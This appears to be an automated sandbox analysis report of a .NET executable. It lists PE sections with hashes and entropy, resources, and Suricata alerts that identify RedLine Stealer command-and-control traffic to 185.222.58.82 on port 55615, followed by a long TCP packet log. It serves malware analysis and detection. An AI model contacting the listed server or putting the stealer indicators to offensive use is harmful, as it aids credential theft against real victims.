IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x890a0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x89b48	0x89c00	51bf76a29b388b61ce853af064b388ef	False	0.9336664161751361	data	7.9180899249634855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x1470	0x1600	74c8227aa2b62d9988635660d284935b	False	0.31605113636363635	data	5.061947155604333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8e000	0xc	0x200	f76ce9affc3a189c6e0def5b8c048cc1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x8c130	0xda8	Device independent bitmap graphic, 26 x 64 x 32, image size 3328	0.2823226544622426
RT_GROUP_ICON	0x8ced8	0x14	data	1.1
RT_VERSION	0x8ceec	0x398	OpenPGP Public Key	0.4217391304347826
RT_MANIFEST	0x8d284	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-04T13:17:16.330585+0100	2849662	ETPRO MALWARE RedLine - CheckConnect Request	1	192.168.2.4	49733	185.222.58.82	55615	TCP
2024-12-04T13:17:21.706312+0100	2045000	ET MALWARE RedLine Stealer - CheckConnect Response	1	185.222.58.82	55615	192.168.2.4	49733	TCP
2024-12-04T13:17:22.355480+0100	2849351	ETPRO MALWARE RedLine - EnvironmentSettings Request	1	192.168.2.4	49733	185.222.58.82	55615	TCP
2024-12-04T13:17:26.198581+0100	2045001	ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound	1	185.222.58.82	55615	192.168.2.4	49733	TCP
2024-12-04T13:17:26.198581+0100	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	185.222.58.82	55615	192.168.2.4	49733	TCP
2024-12-04T13:17:26.832291+0100	2849352	ETPRO MALWARE RedLine - SetEnvironment Request	1	192.168.2.4	49741	185.222.58.82	55615	TCP
2024-12-04T13:17:29.680089+0100	2848200	ETPRO MALWARE RedLine - GetUpdates Request	1	192.168.2.4	49744	185.222.58.82	55615	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 13:17:14.916990995 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:15.036828995 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:15.036958933 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:15.052273035 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:15.173012018 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:15.409168959 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:15.529134989 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:16.279328108 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:16.330585003 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:16.516541004 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:16.564949989 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:21.586102962 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:21.706311941 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:21.946530104 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:21.977878094 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.033740997 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:22.067576885 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.355334997 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.355364084 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.355376005 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.355472088 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:22.355479956 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:22.355581999 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.078363895 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.078937054 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.198580980 CET	55615	49733	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.198718071 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.199068069 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.199068069 CET	49733	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.199942112 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.319674969 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.549679995 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.669683933 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669703960 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669763088 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669769049 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.669775963 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669796944 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669806004 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669826984 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.669863939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669868946 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.669876099 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669923067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669934034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.669938087 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.669986963 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.789813995 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.789846897 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.789884090 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.789916039 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.789961100 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.790045023 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.790095091 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.832185984 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.832290888 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.952198982 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:26.952274084 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:26.996196032 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.118695021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.119115114 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.203267097 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.204025984 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.204112053 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.238990068 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.244039059 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.323941946 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.323978901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.323988914 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324017048 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324057102 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324060917 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324166059 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324176073 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324219942 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324265003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324274063 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324320078 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324348927 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324389935 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324424982 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324470043 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324481964 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324495077 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324534893 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324604988 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324641943 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324657917 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.324698925 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.324701071 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325005054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325015068 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325025082 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325042009 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325052977 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325079918 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325104952 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325115919 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325146914 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325165033 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325210094 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325315952 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325402975 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325444937 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325469017 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325548887 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325592041 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325637102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325762987 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325809002 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325809956 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325862885 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325903893 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.325938940 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.325994015 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.326046944 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.364831924 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.364990950 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444044113 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444118023 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444188118 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444196939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444250107 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444307089 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444354057 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444582939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444629908 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444643021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444689035 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444783926 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444824934 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444829941 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444868088 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444873095 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.444916964 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.444956064 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445010900 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445041895 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445092916 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445094109 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445137024 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445158958 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445218086 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445350885 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445527077 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445574999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445641994 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445713043 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445724964 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445758104 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445769072 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445799112 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445873022 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445966959 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445970058 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.445975065 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.445985079 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446029902 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446090937 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446129084 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446136951 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446156025 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446181059 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446187973 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446202040 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446224928 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446266890 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446275949 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446315050 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446362972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446434021 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446435928 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446481943 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446531057 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446578979 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446582079 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446742058 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446752071 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446791887 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446798086 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446845055 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.446932077 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446940899 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.446991920 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447078943 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447088003 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447128057 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447221994 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447231054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447238922 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447261095 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447268963 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447273970 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447282076 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447321892 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447360992 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447370052 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447421074 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447448015 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447457075 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447487116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447495937 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447501898 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447542906 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447609901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447618008 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447679996 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447735071 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447742939 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447789907 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.447833061 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447849989 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.447889090 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.448441982 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.448529005 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.485594034 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.485642910 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.485651970 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.485697031 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564043999 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564054966 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564090967 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564105988 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564152956 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564161062 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564197063 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564219952 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564234972 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564259052 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564270973 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564290047 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564337015 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564341068 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564383030 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564395905 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564407110 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564450026 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564488888 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564498901 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564538002 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564548016 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564551115 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564588070 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564608097 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564649105 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564656019 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564703941 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564733028 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564743042 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564785004 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564804077 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564814091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564831972 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564855099 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564872980 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564892054 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564902067 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564946890 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.564963102 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.564973116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565006018 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565022945 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565059900 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565068960 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565108061 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565115929 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565144062 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565160990 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565175056 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565184116 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565234900 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565234900 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565269947 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565525055 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565567970 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565571070 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565766096 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565774918 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565834999 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565839052 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565850019 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565891981 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565912962 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565922976 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.565968990 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.565998077 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566008091 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566062927 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566119909 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566129923 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566169024 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566267014 CET	55615	49741	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:27.566313982 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:27.566318035 CET	55615	49741	185.222.58.82	192.168.2.4
